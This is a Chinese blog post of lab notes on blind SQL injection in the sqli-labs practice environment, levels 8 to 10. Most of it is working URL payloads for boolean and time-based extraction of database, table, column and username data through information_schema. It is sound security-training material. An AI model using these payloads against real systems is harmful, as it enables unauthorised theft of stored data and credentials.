sqli-labs闯关笔记-less8-10-盲注

less-8——基于’的盲注

一、布尔型盲注,布尔盲注与less6思路一致。

1、查找注入点

http://127.0.0.1/sqli-labs/Less-8/?id=1

输入单引号,you are in消失,证明存在注入点。

http://127.0.0.1/sqli-labs/Less-8/?id=1'

 找到闭合参数的方法,单引号后面直接加注释,you are in出现,证明闭合方式正确。

http://127.0.0.1/sqli-labs/Less-8/?id=1' -- 

2、猜数据库名

http://127.0.0.1/sqli-labs/Less-8/?id=1' and left((select database()),1)='s'--  

3、猜表名

http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>100-- 

4、猜字段

http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 -- 

5、猜字段的值

http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select username from security.users limit 1,1),1,1)) >1 -- 

二、时间型盲注

当存在注入漏洞时,可以使用延迟注入进行判断,此时若存在漏洞,则睡眠5s之后再返回结果。IF(condition,A,B)如果条件condition为true,则执行语句A,否则执行B

1. http://127.0.0.1/sqli-labs/Less-8/?id=1' and sleep(5) -- 使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。
2. http://127.0.0.1/sqli-labs/Less-8/?id=1' and if(length(database()) = 8,1,sleep(5)) -- 当为8的时候很快加载,而为其他值得时候加载较慢(5s左右),那就说明此时数据库的长度就是8(security)
3. http://127.0.0.1/sqli-labs/Less-8/?id=1' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5)) -- 如果当前数据库的第一个字母的ascii值大于113的时候,会立刻返回结果,否则执行5s。
4. http://127.0.0.1/sqli-labs/Less-8/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5)) -- 同理判断数据库中的第5个数据库的第一位的ascii的值是不是大于112(实际中是115),如果是的则速度返回,否则延时5s返回结果。
5. 其余步骤与法一基本类似,可以采用burpsuite或者是sql盲注脚本使用。

less-9——基于’的时间盲注

less9只能用基于时间的盲注查找注入点了。

1、查找注入点

http://127.0.0.1/sqli-labs/Less-9/?id=1

 输入单引号、双引号、单引号+括号等方式页面都没有任何反应,尝试使用基于时间的盲注来进行注入点判断。

加入sleep函数,界面会反应5秒,证明注入点存在。

http://127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) -- 

 增加sleep函数后用时较长

 

 

 2、通过返回时间进行判断,此时如果数据库长度为8,则可以较快返回。

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())=8,1,sleep(5)) --

3、使用下属方法逐步猜解数据库名、数据库表名、数据库字段等。

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>1,1,sleep(5)) --

less-10——基于"的时间盲注

less10与less9一样,只是基于双引号,不再赘述。

判断注入点,界面会反应5秒,证明注入点存在。

http://127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(5)--

 

posted @ 2021-11-19 15:12  冰雪2021  阅读(251)  评论(0)    收藏  举报
// 侧边栏目录 // https://blog-static.cnblogs.com/files/douzujun/marvin.nav.my1502.css